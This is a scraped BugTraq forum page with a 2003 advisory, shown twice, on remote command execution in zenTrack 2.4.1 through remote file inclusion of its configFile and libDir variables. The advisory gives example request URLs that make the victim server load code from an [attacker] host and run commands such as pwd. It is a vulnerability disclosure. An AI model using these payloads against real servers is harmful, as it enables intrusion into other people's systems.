BugTraq
Back to list
|
Post reply
zenTrack Remote Command Execution Vulnerabilities
Jun 06 2003 01:00AM
farking i-ownur info
(1 replies)
Subject: zenTrack Remote Command Execution Vulnerabilities
Author: farking (farking (at) i-ownur (dot) info [email concealed])
Product: zenTrack 2.4.1 (latest) and below
Vendor: http://zendocs.phpzen.net/zentrack /
http://sourceforge.net/projects/zentrack/
Status: Vendor contacted (27/05/2003)
Location: http://farking.daemon.sh/advisories/zentrack-062003.txt
Greet to: corpsie & EvoIVGSR
Description
-----------
zenTrack is a flexible system for tracking work, requests, information,
and customer care.
The goal of the project is to provide a method for organizing, managing,
and archiving requests, work, and information
in a structured and reliable method.
Details
-------
zenTrack vulnerability exist in header.php that hold zenTrack
configuration settings. Some code
<?
:
$libDir = "/web/zentrack/includes";
$rootUrl = "http://www.yourhost.com/zentrack";
$Debug_Mode = 0;
$Demo_Mode = "off";
$configFile = "$libDir/configVars.php";
:
?>
This allow anyone to take advantage of this vulnerability and run remote
command as webserver privilege. For example:
http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?
cmd=pwd
or
Create translator.class anywhere in your website contain php code that
allow you to run command. For this example I'll
create translator.class in the test directory:
http://[victim]/zentrack/www/index.php?libDir=http://
[attacker]/test/&cmd=pwd
If you dont wan't to see any error just copy translator.class as
zenTrack.class :)
Other vulnerability is attacker can turn zenTrack demo mode to on or set
zenTrack debug mode that will show extra info.
------------------------------
farking (farking (at) i-ownur (dot) info [email concealed])
http://farking.daemon.sh
[ reply ]
Re: zenTrack Remote Command Execution Vulnerabilities
Jun 07 2003 01:51AM
gr00vy (groovy2600 yahoo com ar)
Privacy Statement
Copyright 2010, SecurityFocus
Subject: zenTrack Remote Command Execution Vulnerabilities
Author: farking (farking (at) i-ownur (dot) info [email concealed])
Product: zenTrack 2.4.1 (latest) and below
Vendor: http://zendocs.phpzen.net/zentrack /
http://sourceforge.net/projects/zentrack/
Status: Vendor contacted (27/05/2003)
Location: http://farking.daemon.sh/advisories/zentrack-062003.txt
Greet to: corpsie & EvoIVGSR
Description
-----------
zenTrack is a flexible system for tracking work, requests, information,
and customer care.
The goal of the project is to provide a method for organizing, managing,
and archiving requests, work, and information
in a structured and reliable method.
Details
-------
zenTrack vulnerability exist in header.php that hold zenTrack
configuration settings. Some code
<?
:
$libDir = "/web/zentrack/includes";
$rootUrl = "http://www.yourhost.com/zentrack";
$Debug_Mode = 0;
$Demo_Mode = "off";
$configFile = "$libDir/configVars.php";
:
?>
This allow anyone to take advantage of this vulnerability and run remote
command as webserver privilege. For example:
http://[victim]/zentrack/index.php?configFile=http://[attacker]/cmd.php?
cmd=pwd
or
Create translator.class anywhere in your website contain php code that
allow you to run command. For this example I'll
create translator.class in the test directory:
http://[victim]/zentrack/www/index.php?libDir=http://
[attacker]/test/&cmd=pwd
If you dont wan't to see any error just copy translator.class as
zenTrack.class :)
Other vulnerability is attacker can turn zenTrack demo mode to on or set
zenTrack debug mode that will show extra info.
------------------------------
farking (farking (at) i-ownur (dot) info [email concealed])
http://farking.daemon.sh
[ reply ]